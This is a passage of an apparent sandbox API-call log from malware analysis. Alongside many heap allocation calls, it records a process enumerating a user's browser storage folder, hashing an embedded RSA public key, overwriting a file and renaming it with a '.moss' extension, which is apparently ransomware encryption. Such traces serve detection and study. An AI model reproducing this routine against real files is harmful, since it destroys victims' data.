0x3b4b098 [0173.194] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.194] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0173.194] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360a138 | out: hHeap=0xcd0000) returned 1 [0173.194] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x360a138 [0173.194] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0173.195] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.195] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360a138 | out: hHeap=0xcd0000) returned 1 [0173.195] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x360a138 [0173.195] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0173.195] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.195] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360a138 | out: hHeap=0xcd0000) returned 1 [0173.195] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x360a138 [0173.195] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0173.195] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.195] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360a138 | out: hHeap=0xcd0000) returned 1 [0173.195] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x360a138 [0173.195] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0173.195] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.195] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360a138 | out: hHeap=0xcd0000) returned 1 [0173.195] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x360a138 [0173.195] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0173.195] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.195] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360a138 | out: hHeap=0xcd0000) returned 1 [0173.195] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x360a138 [0173.195] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0173.195] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.195] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360a138 | out: hHeap=0xcd0000) returned 1 [0173.195] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x360a138 [0173.195] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0173.195] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.195] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360a138 | out: hHeap=0xcd0000) returned 1 [0173.195] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x360a138 [0173.196] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0173.196] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.196] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360a138 | out: hHeap=0xcd0000) returned 1 [0173.196] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x360a138 [0173.196] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0173.196] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.196] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360a138 | out: hHeap=0xcd0000) returned 1 [0173.196] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x360a138 [0173.196] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0173.196] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0173.196] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.196] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0173.196] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360a138 | out: hHeap=0xcd0000) returned 1 [0173.196] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x360a138 [0173.196] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0173.196] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.196] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360a138 | out: hHeap=0xcd0000) returned 1 [0173.196] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x360a138 [0173.196] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0173.196] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0173.196] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360a138 | out: hHeap=0xcd0000) returned 1 [0173.196] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x360a138 [0173.196] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0173.196] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0173.196] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360a138 | out: hHeap=0xcd0000) returned 1 [0173.196] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x360a138 [0173.196] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0173.197] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.197] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360a138 | out: hHeap=0xcd0000) returned 1 [0173.197] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x360a138 [0173.197] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0173.197] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.197] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360a138 | out: hHeap=0xcd0000) returned 1 [0173.197] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x360a138 [0173.197] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0173.197] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0173.197] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.197] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0173.197] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360a138 | out: hHeap=0xcd0000) returned 1 [0173.197] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x360a138 [0173.197] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0173.197] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.197] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360a138 | out: hHeap=0xcd0000) returned 1 [0173.197] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x360a138 [0173.197] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0173.197] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.197] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360a138 | out: hHeap=0xcd0000) returned 1 [0173.197] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x360a138 [0173.197] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0173.197] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.197] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360a138 | out: hHeap=0xcd0000) returned 1 [0173.197] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x360a138 [0173.197] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0173.197] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.197] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360a138 | out: hHeap=0xcd0000) returned 1 [0173.197] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x360a138 [0173.198] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0173.198] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.198] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360a138 | out: hHeap=0xcd0000) returned 1 [0173.198] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x360a138 [0173.198] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0173.198] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.198] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360a138 | out: hHeap=0xcd0000) returned 1 [0173.198] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x360a138 [0173.198] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\") returned="3O75JDME\\" [0173.198] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0173.198] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xb0) returned 0x360f2a8 [0173.198] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360a138 | out: hHeap=0xcd0000) returned 1 [0173.198] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\") returned="DOMStore\\" [0173.198] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b46080 [0173.198] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360f2a8 | out: hHeap=0xcd0000) returned 1 [0173.198] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\") returned="Internet Explorer\\" [0173.198] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b50 [0173.198] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0173.198] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ed88 [0173.198] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b46080 | out: hHeap=0xcd0000) returned 1 [0173.198] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0173.198] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71a00 [0173.198] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ed88 | out: hHeap=0xcd0000) returned 1 [0173.198] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0173.198] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362cad8 [0173.198] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71a00 | out: hHeap=0xcd0000) returned 1 [0173.198] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0173.199] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b57d50 [0173.199] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362cad8 | out: hHeap=0xcd0000) returned 1 [0173.199] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0173.199] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0173.199] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b57d50 | out: hHeap=0xcd0000) returned 1 [0173.199] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0173.199] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0173.199] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.199] PathFindFileNameW (pszPath="") returned="" [0173.199] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x360a138 [0173.199] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x605dd8a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x605dd8a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0173.200] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360a138 | out: hHeap=0xcd0000) returned 1 [0173.200] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x605dd8a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x605dd8a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0173.200] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x605dd8a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x605dd8a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x696aec80, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="www.google[1].xml", cAlternateFileName="WWWGOO~1.XML")) returned 1 [0173.200] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x360a138 [0173.200] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11e) returned 0x35deb08 [0173.200] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360a138 | out: hHeap=0xcd0000) returned 1 [0173.200] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\www.google[1].xml") returned=".xml" [0173.201] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\www.google[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\3o75jdme\\www.google[1].xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0173.202] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=13) returned 1 [0173.202] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0173.205] SetFilePointer (in: hFile=0x664, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0173.205] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0xd, lpOverlapped=0x0) returned 1 [0173.206] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0173.206] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0173.206] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0173.207] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0173.207] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2ed88) returned 1 [0173.208] CryptCreateHash (in: hProv=0xd2ed88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0173.208] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0173.208] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0173.208] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0173.208] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0173.208] GetLastError () returned 0x0 [0173.208] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0173.208] CryptReleaseContext (hProv=0xd2ed88, dwFlags=0x0) returned 1 [0173.208] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0173.208] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0173.208] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0173.208] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0173.208] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0173.208] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0173.208] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48a18 [0173.209] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0173.209] WriteFile (in: hFile=0x664, lpBuffer=0x35ceae8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x35ceae8*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0173.209] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\www.google[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\3o75jdme\\www.google[1].xml"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\www.google[1].xml.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\3o75jdme\\www.google[1].xml.moss")) returned 1 [0173.211] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0173.211] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0173.212] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x360a070 [0173.212] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0173.212] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x360a138 [0173.212] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0173.212] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\UV0DUWVB\\") returned="UV0DUWVB\\" [0173.212] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0173.212] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xb0) returned 0x360f2a8 [0173.212] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\") returned="DOMStore\\" [0173.212] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b46080 [0173.212] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\") returned="Internet Explorer\\" [0173.212] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b50 [0173.212] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0173.212] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71a00 [0173.212] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0173.212] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362cad8 [0173.212] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0173.212] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b57d98 [0173.212] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0173.212] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0173.213] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0173.213] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.213] PathFindFileNameW (pszPath="") returned="" [0173.213] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x360a138 [0173.213] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\UV0DUWVB\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x510b3550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x510b3550, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0173.213] FindClose (in: 